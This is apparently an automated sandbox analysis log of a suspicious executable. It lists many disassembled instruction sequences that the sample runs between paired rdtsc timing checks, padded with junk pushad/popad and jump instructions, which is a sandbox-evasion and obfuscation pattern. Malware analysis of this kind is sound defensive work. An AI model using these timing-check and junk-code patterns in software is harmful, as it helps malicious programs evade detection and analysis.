Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C20D44 second address: C20D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 mov dword ptr [ebp+122D3777h], ebx 0x0000000d push 00000000h 0x0000000f add dword ptr [ebp+12467C01h], edi 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1DFC9 second address: C1DFD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C21D27 second address: C21D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1FFCC second address: C1FFFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC9D915F4C7h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC9D915F4BBh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C21D2D second address: C21D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C200E6 second address: C200EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C21E88 second address: C21E92 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC9812 second address: BC9818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC9818 second address: BC9830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC9830 second address: BC9834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD2075 second address: BD207B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C29ED0 second address: C29ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C29ED4 second address: C29EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2D944 second address: C2D948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2D948 second address: C2D94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2D94C second address: C2D952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DAC1 second address: C2DAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DAC5 second address: C2DACF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D915F4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DACF second address: C2DB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC9D8BCC176h 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FC9D8BCC16Bh 0x00000015 popad 0x00000016 jmp 00007FC9D8BCC16Fh 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DD9D second address: C2DDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FC9D915F4BAh 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FC9D915F4C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DDC6 second address: C2DDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007FC9D8BCC188h 0x0000000d push eax 0x0000000e jmp 00007FC9D8BCC16Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BCCEDB second address: BCCEDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C34261 second address: C34277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e jc 00007FC9D8BCC166h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C34277 second address: C3427F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C357A0 second address: C357FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC9D8BCC16Ch 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007FC9D8BCC166h 0x00000014 jmp 00007FC9D8BCC173h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FC9D8BCC16Ah 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push esi 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop esi 0x00000028 jmp 00007FC9D8BCC175h 0x0000002d push eax 0x0000002e push edx 0x0000002f jp 00007FC9D8BCC166h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A636 second address: C3A646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC9D915F4B6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A646 second address: C3A68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jmp 00007FC9D8BCC174h 0x0000000c pushad 0x0000000d jg 00007FC9D8BCC166h 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007FC9D8BCC166h 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FC9D8BCC175h 0x00000022 pushad 0x00000023 popad 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C39880 second address: C39898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FC9D915F4BFh 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C39898 second address: C398BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 jnp 00007FC9D8BCC17Ch 0x0000000d jmp 00007FC9D8BCC170h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C39E71 second address: C39EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC9D915F4C6h 0x0000000b popad 0x0000000c jno 00007FC9D915F4BCh 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jmp 00007FC9D915F4C3h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A330 second address: C3A336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A336 second address: C3A33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A33A second address: C3A33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A4AF second address: C3A4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A4B3 second address: C3A4B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC474A second address: BC4763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC9D915F4C1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC4763 second address: BC4767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC4767 second address: BC476B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC476B second address: BC4771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0E6FE second address: C0E702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0E702 second address: C0E71F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC175h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EBC5 second address: C0EBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EC41 second address: C0EC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EC45 second address: C0EC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FC9D915F4C3h 0x0000000f jmp 00007FC9D915F4BDh 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 js 00007FC9D915F4B8h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push ecx 0x00000020 ja 00007FC9D915F4B6h 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FC9D915F4BCh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EC94 second address: C0ECA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jnp 00007FC9D8BCC166h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EE9B second address: C0EE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EE9F second address: C0EEA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EEA5 second address: C0EEC7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FC9D915F4CFh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC9D915F4BDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F01D second address: C0F021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F021 second address: C0F052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FC9D915F4BDh 0x0000000e jmp 00007FC9D915F4C2h 0x00000013 popad 0x00000014 jc 00007FC9D915F4BCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F13C second address: C0F167 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FC9D8BCC16Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC9D8BCC171h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F167 second address: C0F177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC9D915F4BBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F7BE second address: C0F7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 jns 00007FC9D8BCC16Ch 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC9D8BCC16Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F7E4 second address: C0F811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnl 00007FC9D915F4BEh 0x00000011 push esi 0x00000012 jbe 00007FC9D915F4B6h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FC9D915F4B8h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F811 second address: C0F818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F93F second address: BF1384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D915F4C7h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jg 00007FC9D915F4B6h 0x00000018 pop ecx 0x00000019 jmp 00007FC9D915F4C0h 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+1244D2A4h], edi 0x00000026 lea eax, dword ptr [ebp+1248338Ch] 0x0000002c mov edi, dword ptr [ebp+122D298Dh] 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FC9D915F4BEh 0x00000039 jns 00007FC9D915F4BCh 0x0000003f popad 0x00000040 push eax 0x00000041 push esi 0x00000042 ja 00007FC9D915F4C3h 0x00000048 pop esi 0x00000049 nop 0x0000004a mov edi, dword ptr [ebp+122D30D9h] 0x00000050 call dword ptr [ebp+122D2C89h] 0x00000056 pushad 0x00000057 jmp 00007FC9D915F4C7h 0x0000005c jne 00007FC9D915F4BAh 0x00000062 popad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF1384 second address: BF1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF1388 second address: BF138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF138C second address: BF139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC9D8BCC166h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3DA0F second address: C3DA21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007FC9D915F4C0h 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3DCE2 second address: C3DCE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3DCE8 second address: C3DD07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC9D915F4B6h 0x0000000a jmp 00007FC9D915F4C5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3E0F0 second address: C3E116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Dh 0x00000009 jmp 00007FC9D8BCC175h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C41E78 second address: C41E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D915F4B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C41E82 second address: C41EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jng 00007FC9D8BCC166h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007FC9D8BCC176h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C41EAB second address: C41EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 js 00007FC9D915F4C2h 0x0000000d js 00007FC9D915F4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C47050 second address: C47058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C47058 second address: C47073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FC9D915F4C6h 0x0000000b je 00007FC9D915F4B6h 0x00000011 jmp 00007FC9D915F4BAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C47073 second address: C47085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FC9D8BCC16Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4720C second address: C47233 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D915F4BDh 0x0000000d jmp 00007FC9D915F4C2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4688E second address: C4689B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D8BCC166h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4689B second address: C468A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F4FE second address: C4F504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F504 second address: C4F512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F512 second address: C4F531 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC9D8BCC175h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F531 second address: C4F535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F83D second address: C4F841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F841 second address: C4F845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F845 second address: C4F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4FB62 second address: C4FB68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4FB68 second address: C4FB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5021B second address: C50230 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D915F4B6h 0x00000008 jng 00007FC9D915F4B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C50230 second address: C50236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C534D2 second address: C534D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C534D6 second address: C534DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C534DC second address: C534E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
